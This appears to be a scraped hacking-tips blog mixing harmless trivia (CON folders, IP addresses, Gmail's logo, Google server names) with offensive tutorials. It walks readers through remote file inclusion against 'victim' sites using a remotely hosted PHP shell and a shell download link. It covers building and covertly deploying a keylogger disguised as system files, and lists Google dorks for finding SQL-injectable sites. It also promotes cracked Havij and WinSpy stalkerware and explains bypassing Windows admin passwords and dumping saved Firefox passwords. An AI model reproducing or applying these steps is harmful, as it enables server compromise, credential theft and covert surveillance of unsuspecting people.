How to create CON folder

Not only CON, we cannot create any of these
CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more

The reason is that con, prn, lpt1..lpt9, etc are underlying devices from the time dos was written. so if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

So Now, Try this...

Open the Command prompt by Start -> Run and typing cmd


Code:
C:\> md \\.\c:\con
Now, Open My Computer and browse through the path where you created CON folder... Surprising.. ?? Yeah.. you have created it successfully

Now, try to delete the folder from My computer

OOPS!!! You cant delete it...

Now, try this in command prompt console

Code:
C:\> rd \\.\c:\con
Yeah!! You did it...

How does IP address work?

An Internet Protocol (IP) address is a numerical identification (logical address) that is assigned to devices participating in a computer network utilizing the Internet Protocol for communication between its nodes. Although IP addresses are stored as binary numbers, they are usually displayed in human-readable notations, such as 192.168.100.1 (for IPv4), and 2001:db8:0:1234:0:567:1:1 (for IPv6). The role of the IP address has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

The original designers of TCP/IP defined an IP address as a 32-bit number and this system, now named Internet Protocol Version 4 (IPv4), is still in use today. However, due to the enormous growth of the Internet and the resulting depletion of the address space, a new addressing system (IPv6), using 128 bits for the address, was developed (RFC 1883).

The Internet Protocol also has the task of routing data packets between networks, and IP addresses specify the locations of the source and destination nodes in the topology of the routing system. For this purpose, some of the bits in an IP address are used to designate a subnetwork. (In CIDR notation, the number of bits used for the subnet follows the IP address. E.g. 192.168.100.1/16) An IP address can be private, for use on a LAN, or public, for use on the Internet or other WAN.

Early specifications intended IP addresses to be uniquely assigned to a particular computer or device.[citation needed] However, it was found that this was not always necessary as private networks developed and address space needed to be conserved (IPv4 address exhaustion). RFC 1918 specifies private address spaces that may be reused by anyone; today, such private networks typically access the Internet through Network Address Translation (NAT). In addition, technologies such as anycast addressing have been developed to allow multiple hosts at the same IP address but in different portions of the Internet to service requests by network clients.

The Internet Assigned Numbers Authority (IANA) manages the global IP address space. IANA works in cooperation with five Regional Internet Registries (RIRs) to allocate IP address blocks to Local Internet Registries (Internet service providers) and other entities.
Contents

This is what Ip Address Stands for

For More Details Reffer
http://en.wikipedia.org/wiki/IP_address

Source(s):

The Story Behind Gmail's Logo

If you've ever wondered who designed Gmail's logo.
Dennis Hwang designed the Gmail logo. At the time, Dennis designed virtually all of the Google doodles and he did a lot of the new logo work as well.

The logo was designed literally the night before the product launched. We were up very late and Sergey and I went down to his cube to watch him make it.

The initial version used the same font as the Google logo (Catull), but Catull has a very awkward 'a', so Dennis decided to use Catull for the 'G' to tie the brand to Google, then cast the others in a cleaner sans-serif (Myriad Pro, if I recall correctly).

Another ex-Googler, Douglas Edwards, confirms the story in his book "I'm Feeling Lucky: The Confessions of Google Employee Number 59":

Dennis Hwang spent the day before the launch coming up with ideas for a logo and trying to make it work in conjunction with the clown-colored Google brand. Even after four years at Google, I found it astounding that one twenty-something guy was sitting alone at his desk, sipping tea and developing the main branding element for a product to be used by millions of people - the night before it was scheduled to launch.

Google's Server Names

Here's a list of the Google Servers used by different services as they're returned in the HTTP headers. Not all of them have transparent names and some of them may suggest interesting data (like the ctcserver for the not-yet-existent Google Call service linked from Google's robots.txt). Google Web Server is a modified version of Apache custom server that runs on Linux.

Server Name
Services
GWS (Google Web Server)
Web Search, Image Search and many other services
GFE/1.3 (Google Front-End)
Gmail, Calendar, Picasa Web Albums, Docs, Blogger, orkut, Reader and many other services
GWS-GRFE/0.50
Groups
bsfe (Blog Search Front-End)
Blog Search
OFE/0.1 (Ocean Front-End)
Book Search, Patent Search, Catalogs (Ocean is Google Book Search's code-name)
SMS search frontend 1.0
Google SMS
Search-History HTTP Server
Web History
Auto-Completion Server
Google Suggest, Firefox/Google Toolbar auto-complete
TrustRank Frontend
Safe Browsing
GCS/1.0
Safe Browsing
SFE/0.8
Finance
FTS (C)1997-2007 Interactive Data Managed Solutions AG
Finance charts
asfe
Base
mediaserver
Base (images)
cffe
Product Search (Froogle)
btfe
Thumbnails: Image Search, Google Video, Youtube
Video Stats Server
Google Video
cachefe:image (Cache Front-End)
Picasa Web photos
staticfe
interface images (Picasa Web)
ctcserver
Google Call ( www.google.com/call )
GoogleChartServer/1.0
used for dynamically-generated charts (e.g.: Google Video's stats)
NFE/1.0 (News Front-End)
News
mfe (Maps Front-End)
Maps
Keyhole Server 2.4
Maps, Earth (imagery)
PSFE/4.0
Alerts
igfe (iGoogle Front-End)
iGoogle
COMINST/1.0
Testing software installation (Pack, Picasa)
TWS/0.9 (Translation Web Server)
Translate
mws (Music Web Server)
Music Search
R2FE/1.0 (Reviews Front-End)
Reviews (Music, Movies)
zfe
Reviews
pfe
Co-op
codesite/5477219
Code
ga-reporting-fe
Analytics reporting
ucfe
Analytics
lpfe
Analytics (www.google-analytics.com/siteopt.js)
Toolbar Gaia User Service Server
Google Toolbar authentication
cafe (Ad Conversion Front-End)
Conversions
AdClickServer
Google test ad server
Google Trends
Google Trends
TFE/0.0 (Transliteration Front-End)
Google Indic Transliteration
Apache
most Labs services

What is FUD Crypter? Download it for Free




This hack has no restrictions , using this hack you can hack each and every computer.

First of all Download the ERD(Emergency Rescue Disk)  commander... Extract the Files and Make a CD...

STEPS INVOLVED :

1. Insert the ERD Commander Boot CD into the drive and restart the system
2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
3. Select your Windows XP installation from the list as shown.


4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith

5. Click Next


6. Select the administrator account from the list for which you want to reset the password.


7. Type the new password in both the boxes, click Next and click Finish


8 . Restart The System and take the CD out of the Drive..And Enjoy Admin account...

Enjoy..!!!!

DOWNLOAD ERD COMMANDER
Download Link  http://adf.ly/3b1vA

TAB NAPPING


An insecurity expert on Mozilla's Firefox web browser team has warned about a form of an advansed phishing attack also known as 'tab napping'.
  •  WAT IS TAB NAPPING?
  Unlike the traditional phishing that relies on getting users to click through on a URL that redirect to the phishing site and reveal their user credential, Tab napping relies on a fact that most people use tabbed browsing (Openning multiple tabs while browsing)
  • HOW DOES TAB NAPPING WORK?
During a tab napping attack, One of the inactive tabs is replaced by a phishing page without the user's knowladge. For example one of your inactive tab in which you have opened your facebook account will be automatically replaced with the phishing login page that looks exactly like that of facebook and you will be asked to enter your Username and password. Once these details are entered, they will be sent to the hacker & you will be redirected to the Original facebook
  •  HOW TO PREVENT THIS ATTACK?
Tab napping always takes advantage the user's assumption that a tabbed web page stays the same when other Internet services are being accessed. Therefore to protect yourself from this type of an attack, you always have to;
  1. Log out & close the tab when it is unusable
  2. Always Check the url when returning from another tab, make sure it is on secure connection (https://site.com)
  3. Close & open a new tab if u notice anything unussual about the url 
  4. Format the habit of openning multiple tabs unnecessarily when browsing the web

HOW TO POST EMPTY STATUS ON FACEBOOK

It is rather wierd but a fact that you can now post an empty status on facebook by simply using any of the following methods.


Method 1
As you are logged in to your facebook account ;
  • Go to the update status field
  • Hold the Alt key and type 0173
  • Realease the Alt key and post.
Method 2
  • Go to update status field
  • Type @[2:2: ]
  • Then post it

HOW TO HACK A WEBSITE BY ''REMOTE FILE INCLUSION'' (RFI)

Remote File Inclusion ( RFI ) allows an attacker to upload his file on a website server using a script. RFI is a common vulnerability found in many websites. Using RFI you can literally deface a websites and get complete access to the server. In this tutorial, i'll try to make it as simple as possible.. (Noob Friendly)

1. Searching for RFI vulnerability


The valnerability is ussually found in websites that have a url navigation that is similar to;

  • www.victimwebsite.com/index.php?page=something

This can be found by the use of google dorks.. e.g inurl:index.php?page=

2. Testing for RFI vulnerability

After targeting a website, you need to make sure that its realy vulnerable to this type of attack by testing using:

  • www.victimwebsite.com/index.php?page=http://www.google.com/?

Press enter and if the google home page appears instead of the victim's website, then it is vulnerable to RFI

3. Gaining Access to the server

Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view directories of a server, viewing files, deleting files and letting you run commands.

DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php

Now upload the shell to any webhost (hacker's website) and get the url of that
e.g    www.hackerwebsite.com/shell.txt

You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as ''shell.php'', its going to execute on the hacker's website instead of the victim's website,. get my point?

Now you need to hook up your victim's server to your shell by replacing the google url with your shell url so that it looks like this;

 www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt

Hit enter!!! and its game over.... you have complete access to the victim's server and you can do anything with it... :P
 The above image shows how your shell window would look like after you have successfully hacked into a website.

HOW TO HACK FACEBOOK | GMAIL ... etc USING RAPZO KEYLOGGER

 Just like any other keylogger,.. Rapzo logger is a keystroke recorder that captures user's activity and saves it to an encrypted log file which can be viewed remotly via email. To hack using this tool, follow the following steps:
  1. Download Rapzo Keylogger
  2. Make sure that you have microsoft net framework installed on your computer.
  3. Extract the Rapzo keylogger archive and run RapZo logger.exe
  4. In the Mail setup tab, check on Enable to highlight the mail setup options as shown below
 
     5. Enter your email adress where it says ''Enter Username'' and your password where it says 
         ''Enter Password''... Take it easy, you wont get hacked,. if you want to be very sure, you can
         create another account just for hacking purpose at gmail.com .
     6. Then enter the same email address on ''Logs send To'' and click on Test Me to verify if your 
         email address is working & that your logs can go through.
     7. Now Click on the Options tab on top and check on your desired options as shown below:

  • I recomend that you should NOT check on fake error as this may alert your victim. The habbit of creating fake errors has been famously known, so i personally dont advise people to do that. Instead just drop a sillent install on your victim.
     8. After that, go back to the Mail Setup tab, and click on Build to create ''server.exe'' file and
         send it to your victim.

NOTE THAT
Whenever you want to hack remotly with keyloggers, RATS, or other spyware programs, please avoid sending out server files with names like server.exe, install.exe...... e.t.c nowadays noobs are smart, most of them know exactly what kind of actions these files perfom. Instead you should always try to rename your server file with something similar to a system file name like explore.exe, taskmngr.exe, taskhost.exe,.. then bind it to any file, this way, your victim will have a hard time identifying the server file once it gets installed onto his computer.

DOWNLOAD

HAVIJ SQL INJECTION TOOL | FULL VERSION CRACK

Havij is an automated SQL Injection tool that helps penetration testers to search and find SQL vulnerabilities on a web page.

 By taking advantage of an SQL vulnerable web application, a user can use this software to perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

Compared to other SQL vulnerability scanners, Havij has a 95% success rate and has a very friendly user interface which makes it easier for every noob hacker to use.



 What's New?
  •  Oracle error based database added with ability to execute query.
  • Getting tables and column when database name is unknown added (mysql)
  • Another method added for finding columns count and string column in PostgreSQL
  • Automatic keyword finder optimized and some bugs fixed.
  • A bug in finding valid string column in mysql fixed.
  •  'Key is not unique' bug fixed
  • Getting data starts from row 2 when All in One fails - bug fixed
  • Run time error when finding keyword fixed.
  • False table finding in access fixed.
  • keyword correction method made better
  • A bug in getting current data base in mssql fixed.
  • A secondary method added when input value doesn't return a normal page (usually 404 not found)
  • Data extraction bug in html-encoded pages fixed.
  • String or integer type detection made better.
  • A bug in https injection fixed.
DOWNLOAD

LIST OF GOOGLE DORKS FOR SQL INJECTION


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:roduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:gl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:pinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurl:roductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:roduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurl:op.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:read.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl;roduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id

HOW TO CREATE A WINDOWS FOLDER NAMED ''CON''

According to the fictious messages tha have been circulating through the internet that it is not possible to create a folder named "CON" on a Microsoft Windows based computer. Not Only CON, the same happens with.. PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more..

The message claims that not even Bill Gates or the whole Microsoft "Team" can explain why this is be so.
Well,. this message is partially true,
  • Yess you cannot create a CON folder using the ordinary way of creating a folder,.. i.e right click desktop=> New=> Folder.........blah blah blah.. error! :P .........its not going to work..
The reason is that con, prn, lpt1..com1 e.t.c, are underlying devices from the time dos was written. therefore if you are allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused or rather give an error on where to write the data, to virtual con folder or real one 
  • The other fact is that yes!!! it is 100% possible, you can create a folder named CON on windows based computers

HOW TO CTEATE IT?

Open the Command prompt by Start -> Run and typing cmd

Code:
C:\> md \\.\c:\con

Now, Open My Computer and browse through the path where you created CON folder... successful!!! You will see the folder you have right in drive C

Now, try to delete the folder from My computer
Error!!! You cant delete it using the ordinary way too :P

Now, try this in command prompt console to delete it

Code:
C:\> rd \\.\c:\con

Press enter and congratulations.. you have deleted it  :D

How to Recover Your Master Password

Reset Master Password


Have you lost your master password?
If you want to add another layer of protection to your Firefox browser, you can turn on the master password option.  In short, this will allow you to secure your login information – especially if your PC is used by more than one person, so they can’t snoop through Firefox’s options and find your passwords.
Now if you find yourself not remembering your master password, there is an easy way to reset it.  There is a down side though, because resetting your master password will remove all of your saved user names and passwords. To start the process, copy and paste this location into your Firefox address bar:
chrome://pippki/content/resetpassword.xul
This is your “Reset Master Password” page.  For one more time, it warns you:
If you reset your master password, all your stored web and e-mail password, form data, personal certificates, and private keys will be forgotten. Are you sure you want to reset your master password?
Then you will be given the option to “Reset” or “Cancel”.  Hit the button labled “Reset” and your master password should be reset.

WINSPY PRO v9.0.175 CRACK

Win Spy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC (Win98/ME/NT40/2000/XP/ Vista 32). It includes Remote Install and Realtime Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. A special hotkey is used to login and access the program. Hacked users will not be able to terminate or uninstall Win-Spy.

Features

• Key Recorder
• Stealth Monitoring
• Screen Capture
• KeyWord Alerter
• Folder Hider
• Monitor Networks
• Clear Tracks Utility
• WebCam via Internet
• Lost PC Tracking
• Secure File Deletion
• Time on Net Report
• Websites Visited Reports
• Immune to Anti-Spyware
• NEW – Remote Install
• NEW – Remote PC Shutdown
• NEW – Remote PC FTP
• NEW – WebCam-Motion Detect
• NEW – WebAccess Remote PC
• NEW – Remote Screen Capture
• NEW – Remote Keylogger
• NEW – Remote PC Browser
• NEW – Notify’s User Online
• NEW – Remote Sound Lis/Rec
• NEW – Remote Cam View/Rec
• NEW – Remote file launch
• NEW – DualSide Chat Recording

- Monitor multiple remote PC
- Remote Deployment and Monitoring
- Remote FTP (upload/download) any file to remote PC
- Password Protected and special Hot Key for program
- Monitor in Total Stealth
- Monitor Remote PC Webcam
- Monitor Chat Room (dual side) and Web Activity
- Monitor any Email
- Monitor Children’s activities on Computer / Web
- Monitor Employees or counter monitor employers
- Monitor a cheating spouse
- Records any password
- Monitors across networks
- Monitor by user
- Monitor via Webcam (record/view)
- Monitor via Mic (record/view)

DOWNLOAD WINSPY

HOW TO EXTRACT ALL USERNAMES & PASSWORDS STORED IN MOZILLA FIREFOX

PasswordFox - small password recovery tool that allows a user to view the usernames and passwords stored under Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
PasswordFox works on every platform of microsoft wondows - Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows 7

How to Use PasswordFox

First, download passwordFoxhttp://www.nirsoft.net/utils/passwordfox.zip
  • Extract the rar file
  • Double click on Password Fox
  • Within a matter of second the software will scan all the saved password in Mozilla Firefox
  • If you want to save all password
  • Click on EDIT->SELECT ALL-> FILE->SAVE AS->Type the filename and select the type of extension and Click on SAVE.




 
 


NOTE: Such tools might be detected by your Antivirus Software not because they have a virus/Trojan, but because they are simply Hacking tools. Therefore it'll be nothing but a false positive detection.

Enjoy: D